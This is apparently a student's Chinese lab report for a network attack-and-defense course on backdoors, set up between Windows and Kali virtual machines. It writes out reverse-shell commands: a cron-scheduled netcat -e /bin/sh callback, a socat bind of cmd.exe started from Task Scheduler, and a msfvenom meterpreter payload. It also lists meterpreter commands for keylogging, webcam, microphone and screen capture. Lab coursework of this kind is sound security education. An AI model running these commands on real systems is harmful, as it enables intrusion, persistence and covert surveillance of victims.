20145307陈俊达《网络对抗》Exp2 后门原理与实践
20145307陈俊达《网络对抗》Exp2 后门原理与实践
基础问题回答
例举你能想到的一个后门进入到你系统中的可能方式?
非正规网站下载的软件 脚本 或者游戏中附加的第三方插件
例举你知道的后门如何启动起来(win及linux)的方式?
自启动型木马,windows计划任务
Meterpreter有哪些给你映像深刻的功能?
自动制作后门这点很厉害,黑客只需要输入命令即可,键盘录入器这是最致命的,你所有的密码都会被发现并记录
如何发现自己有系统有没有被安装后门?
及时安装可靠的防火墙
常用后门工具实践
Windows获得Linux Shell
在Windows下,先使用ipconfig指令查看本机IP,使用ncat.exe程序监听本机的5307端口:
在Kali环境下,使用nc指令的-e选项反向连接Windows主机的5307端口:
Linux获得Windows Shell
过程与之前的类似,使用nc指令监听5307端口:
实验内容
使用netcat获取主机操作Shell,cron启动
先在Windows系统下,监听5307端口
用crontab -e指令编辑一条定时任务,选择编辑器时选择基本的vim编辑器就行:
在最后一行添加30 * * * * /bin/netcat 192.168.79.130 5307 -e /bin/sh,意思是在每个小时的第30分钟反向连接Windows主机的5307端口
使用socat获取主机操作Shell, 任务计划启动
基础知识
socat是ncat的增强版,它使用的格式是socat [options]
,其中两个address是必选项,而options 是可选项。实践过程
在Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器:
在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5307 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5307,同时把cmd.exe的stderr重定向到stdout上:
创建完成之后,注销用户,并再次登录
此时,在Kali环境下输入指令socat - tcp:192.168.79.130:5307,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的5307端口,此时可以发现已经成功获得了一个cmd shell:
使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.79.128 LPORT=5307 -f exe > 20145307_backdoor.exe生成后门程序,通过nc指令将生成的后门程序传送到Windows主机上
在Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口:
设置完成后,执行监听:
打开Windows上的后门程序此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell:
使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权,使用record_mic指令可以截获一段音频,使用webcam_snap指令可以使用摄像头进行拍照,使用webcam stream指令可以使用摄像头进行录像,使用screenshot指令可以进行截屏,使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录
对对对,但是我用的win7虚拟机,没摄像头驱动,没麦克风驱动,但是屏幕截图还是可以做的吗!截个图表示我这个鬼东西做出来了 是能用的